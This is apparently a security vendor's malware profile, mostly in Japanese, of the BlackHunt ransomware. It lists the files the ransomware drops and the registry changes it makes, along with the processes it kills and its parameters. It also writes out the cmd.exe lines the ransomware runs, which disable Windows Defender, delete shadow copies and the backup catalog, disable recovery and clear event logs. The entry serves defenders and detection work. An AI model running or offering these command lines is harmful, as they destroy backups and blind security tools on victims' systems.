Ransom.Win32.BLACKHUNT.THLBHBB

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

身代金要求文書のファイルを作成します。

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のファイルを作成します。

• {Encrypted Directory}\#BlackHunt_Private.key
• {Encrypted Directory}\#BlackHunt_ReadMe.hta
• {Encrypted Directory}\#BlackHunt_ReadMe.txt
• %ProgramData%\#BlackHunt_BG.jpg
• %ProgramData%\#BlackHunt_Icon.ico
• %ProgramData%\#BlackHunt_ID.txt
• %ProgramData%\#BlackHunt_Logs.txt
• %ProgramData%\#BlackHunt_Public.key

(註：%ProgramData%フォルダは、マルチユーザーシステムにおいて任意のユーザがプログラムに変更を加えることができるプログラムファイルフォルダのバージョンです。これには、すべてのユーザのアプリケーションデータが含まれます。Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\ProgramData" です。Windows Server 2003(32-bit)、2000(32-bit)、XPの場合、通常 "C:\Documents and Settings\All Users" です。 )

マルウェアは、以下のプロセスを追加します。

• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\classes\.Black"" /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\classes\.Black\DefaultIcon"" /ve /t REG_SZ /d ""C:ProgramData\#Blackhunt_Icon.ico"" /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\classes\Black"" /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\classes\Black\DefaultIcon"" /ve /t REG_SZ /d ""C:ProgramData\#Blackhunt_Icon.ico"" /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"" /v ""{2C5F9FCC-F266-43F6-BFD7-838DAEE269E11}"" /T reg_sz /D ""C:ProgramData\#BlackHunt_ReadMe.hta"" /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windowa Defender""" /v ""DisableAntiSpyware""
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windowa Defender\Real-Time Protection"" /v ""DisableRealtimeMonitoring"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windowa Defender\Spynet"" /v ""SubmitSamplesConsent"" /t REG_DWORD /d 2 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windowa Defender\Threats"" /v ""Threats_ThreatSeverityDefaultAction"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windowa Defender\Threats\ThreaServerityDefaultAction"" /v ""Low"" /t REG_DWORD /d 6 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windowa Defender\Threats\ThreaServerityDefaultAction"" /v ""Medium"" /t REG_DWORD /d 6 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windowa Defender\Threats\ThreaServerityDefaultAction"" /v ""High"" /t REG_DWORD /d 6 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windowa Defender\Threats\ThreaServerityDefaultAction"" /v ""Severe"" /t REG_DWORD /d 6 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windowa Defender\UX Configuration"" /v ""Notification_Suppress"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"" /v ""NoClose"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"" /v ""StartMenuLogOff"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""DisableChangePassword"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""DisableLockWorkstation"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""NoLogoff"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""DisableLockWorkstation"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\SystemRestore"" /v "DisableConfig"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\SystemRestore"" /v "DisableSR"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\WinRE"" /v ""DisableSetup"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Backup\Client"" /v ""DisableBackupLauncher"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Backup\Client"" /v ""DisableRestoreUI"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Backup\Client"" /v ""DisableSystemBackUI"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Backup\Client"" /v ""DisableBackupUI"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""DisableTaskMgr"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"" /v ""NoRun"" /t REG_DWORD /d 1 /f"
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"" /v ""SecurityService"" /t REG_SZ /d ""[Malware File path] -backups"" /f'
• cmd.exe "/c SchTasks.exe /Create /RU ""NT AUTHORITY\SYSTEM'' /sc onstart /TN ""UPdate service Windows System"" /TR ""[Malware File Path] -backups""
• cmd.exe "/c vssadmin.exe Delete shadows /all /quiet"
• cmd.exe "/c bcdedit /set (default) recoveryenabled No"
• cmd.exe "/c bcdedit /set (default) bootstatuspolicy IgnoreAllFailures"
• cmd.exe "/c fsutil.exe usn deletejournal /D [drive]"
• cmd.exe "/c wbadmin.exe delete catalog -quiet"
• cmd.exe "/c schtasks.exe /Change /TN ""\Microsoft\Windows\SystemRestore\SR"" /disable
• cmd.exe "/c reg add ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""DisableTaskMgr"" /t REG_DWORD /d 0 /f"
• cmd.exe "/c REG_ADD ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""legalnoticecaption"" /t REG_SZ /d ""WARNING WARNING WARNING . "" /f"
• cmd.exe " "/c REG_ADD ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""legalnoticetext" /t REG_SZ /d "Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen, Do You Want Your Files? read [ReadMe] Files carefully and contact us by ["{BLOCKED}096@gmail.com" ] AND ["{BLOCKED}46@onionmail.com" ] "" /f"
• cmd.exe "/c REG DELETE ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"" /v ""HealthService"" /f"
• cmd.exe "/c reg add ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""DisableTaskMgr"" /t REG_DWORD /d 0 /f"
• cmd.exe "/c reg add ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"" /v ""NoRun"
• cmd.exe "/c shutdown /r /t 10 /f"
• cmd.exe "/c taskkill /IM mshta.exe /f"
• cmd.exe "/c notepad.exe C:ProgramData\#BlackHunt_ReadMe.txt"
• cmd.exe "/c C:\ProgramData\#BlackHunt_ReadMe.hta"
• cmd.exe "/c shutdown /r /t 15 /f"
• cmd.exe "start /min cmd/c del /F [Malware File Path]
• Create process - "[malware file path] -nomutex -nologs -p [network drive] " →if -shares is enabled
• cmd "/c wevtutil.exe cl Setup"
• cmd "/c wevtutil.exe cl System"
• cmd "/c wevtutil.exe cl Application"
• cmd "/c wevtutil.exe cl Security"
• cmd "/c wevtutil.exe cl Security /e:false"

マルウェアは、以下の Mutex を作成し、メモリ上で自身の重複実行を避けます。

• BLACK_HUNT_MUTEX

自動実行方法

マルウェアは、自身のコピーがWindows起動時に自動実行されるよう以下のレジストリ値を追加します。

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Run
SecurityService = {Malware File path} -backups

他のシステム変更

マルウェアは、以下のレジストリ値を追加します。

HKEY_LOCAL_MACHINE\Software\classes\
.Black\DefaultIcon
(Default) = %ProgramData%\#BlackHunt_Icon.ico

HKEY_LOCAL_MACHINE\Software\classes\
Black\DefaultIcon
(Default) = %ProgramData%\#BlackHunt_Icon.ico

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Run
{2C5F9FCC-F266-43F6-BFD7-838DAEE269E11} = %ProgramData%\#BlackHunt_ReadMe.hta

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows Defender
DisableAntiSpyware = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows Defender\Spynet
SubmitSamplesConsent = 2

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows Defender\Real-Time Protection
DisableRealtimeMonitoring = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows Defender\Threats
Threats_ThreatSeverityDefaultAction = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows Defender\Threats\ThreaServerityDefaultAction
Low = 6

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows Defender\Threats\ThreaServerityDefaultAction
Medium = 6

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows Defender\Threats\ThreaServerityDefaultAction
High = 6

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows Defender\Threats\ThreaServerityDefaultAction
Severe = 6

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows Defender\UX Configuration
Notification_Suppress = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\
Explorer
NoClose = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\
Explorer
StartMenuLogOff = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\
System
DisableChangePassword = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\
System
DisableLockWorkstation = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\
System
NoLogoff = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\
System
DisableLockWorkstation = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows NT\SystemRestore
DisableConfig = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows NT\SystemRestore
DisableSR = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\WinRE
DisableSetup = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\Backup\Client
DisableBackupLauncher = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\Backup\Client
DisableRestoreUI = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\Backup\Client
DisableSystemBackUI = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\Backup\Client
DisableBackupUI = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\
System
DisableTaskMgr = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\
Explorer
NoRun = 1

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\
System
DisableTaskMgr = 0

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\
System
legalnoticecaption = WARNING WARNING WARNING .

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\
System
legalnoticetext = Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen, Do You Want Your Files? read [ReadMe] Files carefully and contact us by ["{BLOCKED}096@gmail.com"] AND ["{BLOCKED}46@onionmail.com"]

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\
System
DisableTaskMgr = 0

マルウェアは、以下のレジストリ値を変更します。

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\
System
EnableLUA = 0

(註：変更前の上記レジストリ値は、「1」となります。)

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Policies\
System
EnableLinkedConnection = 1

(註：変更前の上記レジストリ値は、「0」となります。)

マルウェアは、コンピュータのデスクトップの壁紙に以下の画像を設定します。

• %ProgramData%\#BlackHunt_BG.jpg
  

感染活動

マルウェアは、以下のドライブ内に自身のコピーを作成します。

• Shared Networks →If -spread is enabled
• Removable Drives →If -spread is enabled

プロセスの終了

マルウェアは、感染コンピュータ上で以下のプロセスが常駐されていることを確認した場合、そのプロセスを終了します。

• sql.exe
• mbamtray.exe
• Ntrtscan.exe
• CNTAoSMgr.exe
• PccNTMon.exe
• tmlisten.exe
• xfssvccon.exe
• zoolz.exe
• agntsvc.exe
• dbeng50.exe
• dbsnmp.exe
• encsvc.exe
• firefoxconfig.exe
• infopath.exe
• isqlplussvc.exe
• msftesql.exe
• mydesktopqos.exe
• mydesktopservice.exe
• mysqld.exe
• mysqld-nt.exe
• mysqld-opt.exe
• thebat64.exe
• ocomm.exe
• thebat.exe
• tbirdconfig.exe
• notepad++.exe
• powerpnt.exe
• sqbcoreservice.exe
• sqlagent.exe
• sqlbrowser.exe
• sqlservr.exe
• sqlwriter.exe
• synctime.exe
• note
• sql
• oracle.exe
• ocssd.exe
• dbsnmp.exe
• synctime.exe
• agntsvc.exe
• isqlplussvc.exe
• xfssvccon.exe
• mydesktopservice.exe
• ocautoupds.exe
• encsvc.exe
• firefox.exe
• tbirdconfig.exe
• mydesktopqos.exe
• excel.exe
• msaccess.exe
• mspub.exe
• onenote.exe
• outlook.exe
• steam.exe
• thunderbird.exe
• visio.exe
• winword.exe
• wordpad.exe
• notepad.exe

その他

マルウェアは、以下を実行します。

• Connects to the following website to check the IP details:
  • ip-api.com
• It terminates if the infected machine's country is among the list of countries below:
  • Azerbaijan
  • Armenia
  • Belarus
  • Georgia
  • Kazakhstan
  • Kyrgzstan
  • Moldova
  • Tajikistan
  • Turkmenistan
  • Uzbekistan
  • Ukraine
  • Iran
  • Turkey
• Terminates the following services:
  • SQLAgent$SQLEXPRESS
  • MSSQL$QLEXPRESS
  • SQLWriter
  • SQLBrowser
  • MSSQLSERVER
  • MSSQL$CONTOSO1\
  • SQLServer (MSSQLSERVER)
  • MSSQL$SQLSERVERAGENT
  • vmvss
  • MSSQL$FE EXPRESS
  • SQLANYs_Sage_FAS_Fixed_Assets
  • MSSQL$VIM_SQLEXP
  • MSSQLFDLauncher
  • SQLTELEMETRY
  • MsDtsServer130
  • SSISTELEMETRY130
  • MSSQL$VEEAMSQL2012
  • SQLAgent$VEEAMSQL2012
  • SQLAgent
  • MSSQLServerADHelper100
  • MSSQLServerOLAPService
  • MsDtServer100
  • ReportServer
  • SQLTELEMETRY$HL
  • TMBMServer
  • MSSQL%PROGID
  • MSSQL$WOLTERSKLUWER
  • SQLAgent$PROGID
  • SQLAgent$WOLTERSKLUWER
  • MSSQLFDLauncher$OPTIMA
  • MSSQL$OPTIMA
  • SQLAgent$OPTIMA
  • ReportServer$OPTIMA
  • msftesql$SQLEXPRESS
  • postgresql-x64-9.4
  • MSDTC
  • vmicvss
  • HostControllerService
  • MSComplianceAudit
  • MSExchanfeADTopolog
  • MSExchangeAntispamUpdate
  • MSExchangeCompliance
  • MSExchangeDagMgmt
  • MSExchangeDelivery
  • MSExchanfeDiagnostics
  • MSExchangeEdgeSync
  • MSExchangeFastSearch
  • MSExchangeFrontEndTransport
  • MSExchangeHM
  • MSExchangeHMRecovery
  • MSExchangeImap4
  • MSExchangeIMAP4BE
  • MSExchangeIS
  • MSExchangeMailboxAssistants
  • MSExchangeMailboxReplication
  • MSExchangeNotificationBroker
  • MSExchangePop3
  • MSExchangePO3BE
  • MSExchangeRepl
  • MSExchangeRPC
  • MSEchangeChangeServiceHost
  • MSExchangeSubmission
  • MSExchangeThrottling
  • MSExchangeTransport
  • MSExchangeTransportLogSearch
  • MSExchangeVM
  • MSExchangeVMCR
  • SearchEchangeTracing
  • wsbexchange
  • IISADMIN
  • Tomcat8CLOUDERP
  • Tomcat8_DESARROLLO221
  • sql
  • System Event Notification
  • COM+ Event System
  • Microsoft Software Shadow Copy Provider
  • Volume Shadow Copy
  • swprv
  • vds
  • vss
  • svc$
  • memtas
  • mepocs
  • sophos
  • veeam
  • backup
  • GxVss
  • GxBlr
  • GxFWD
  • GxCVD
  • GxCIMgr
  • DefWatch
  • ccEvtMgr
  • ccSetMgr
  • SavRoam
  • RTVscan
  • QBfCService
  • QBIDPService
  • Intuit
  • QuickBooks
  • FCS
  • QBCFMonitoSerive
  • YooBackup
  • YooIT
  • Zhudongfangyu
  • str_raw_agent
  • VSNAPVSS
  • VeeamTransportSvc
  • VeeamDeploymentService
  • VeeamNFSSvc
  • PDVFSService
  • BackupExecVSSProvider
  • BackupExecAgentAccelerator
  • BackupExecAgentBrowser
  • BackupExecDiveciMediaService
  • BackupExecJobEngine
  • BackupExecManagementService
  • BackupExecRPCService
  • AcrSch2Svc
  • AcronisAgent
  • CASAD2DWebSvc
  • CAARCUpdateSvc
• It terminates if the following processes are found:
  • ProcessHacker
  • Procexp64
  • Procexp
  • WireShark
  • dumpcap
  • Sysmon
  • Sysmon64
  • procexp64a
  • procmon
  • procmon64
  • procmon64a
  • OLLYDBG
  • x64dbg
  • x86dbg
  • idaq
  • idaq64
  • WinDbgFrameClass
  • zeta Debuger
  • Rock Debugger
  • ObsidianGUI
  • ID.exe
  • lordpe
  • Die.exe
  • xntsv
  • xocalc
  • xvlk
  • NFD.exe
  • PDBRIPPER
  • IDA64
  • IDA.exe
  • Immunitydebugger
  • ghidra
  • x32dbg
• It terminates if the machine has the following system language:
  • 82C →Azeri(Azerbaijan)
  • 42C →Azeri(Azerbaijan)
  • 42B →Armenian(Armenia)
  • 423 →Belarusian(Belarus)
  • 437 →Georgian(Georgia)
  • 42F →Macedonian(Macedonia)
  • 440 →Kyrgyz(Kyrgyzstan)
  • 819 →Russian(Russia)
  • 428 →Tajic(Tajikistan)
  • 442 →Turkmen(Turkmenistan)
  • 843 →Uzbek-Cyrillic(Uzbekistan
  • 443 →Uzbek-Latin(Uzbekistan)
  • 422 →Ukrainian(Ukraine)
  • 429 →Persian(Iran)
  • 41F →Turkish(Turkey)
• Empty Recycled Bin
• Disable Windows Defender
• Appends "#BLACK_HUNT#" in every encrypted files
• Change the icon of encrypted files with %ProgramData%\#BlackHunt_Icon.ico
  

マルウェアは、以下のパラメータを受け取ります。

• -p → Only process files inside defined paths
• -nologs →Disable File logging
• -nomutex →Disable Mutex Creation
• -update →Run fake windows update
• -shares →enable shares configuration
• -scanner →enable network scanning
• -noshares →disable shares configuration
• -safemode →enable safemode booting
• -backups →delete backups
• -cipher →enable cipher configuration
• -restart →restart system after finished encryption
  
• -shareinfo →doesnt hide its window
• -info →display on its windows files being encrypted
• -status →displays status of encryption
  
• -spread →enable to propagate itself to removable drives and network drives
• -noencrypt →Initialize but it wont proceed with its encryption routine
• -virtual →

ランサムウェアの不正活動

マルウェアは、ファイル名に以下の文字列を含むファイルの暗号化はしません。

• .exe
• .dll
• BlackHunt
• .Black
• .Hunt
• .lnk
• .sys
• .msi
• .bat
• $Recycle.Bin
• autorun.inf
• boot.ini
• bootfront.bin
• bootsect.bak
• bootmgr
• bootmgr.efi
• bootmgfw.efi
• desktop.ini
• iconcache.db
• ntldr
• ntuser.ini
• thumbs.db
• pagefile.sys
• win.ini
• UsrClass.dat
• hiberfil.sys
• DumpStack.log.tmp
• Config.Msi

マルウェアは、ファイルパスに以下の文字列を含むファイルの暗号化はしません。

• Windows
• tmp
• winnt
• temp
• $Mft
• C:\Users\Default
• thumb
• $Recycle.Bin
• System Volume Information
• Boot
• All Users
• Trend Micro
• perflogs
• Microsoft
• chrome
• Internet Explorer
• Mozilla
• Windows.old
• Tor Browser
• sql
• WindowsImageBackup
• databasr
• Backup
• command

マルウェアは、暗号化されたファイルのファイル名に以下の拡張子を追加します。

• .[Random 16 Character].[Email address].Black

マルウェアが作成する以下のファイルは、脅迫状です。

• {Encrypted folder}\#BlackHunt_ReadMe.hta
  
• {Encrypted folder}\#BlackHunt_ReadMe.txt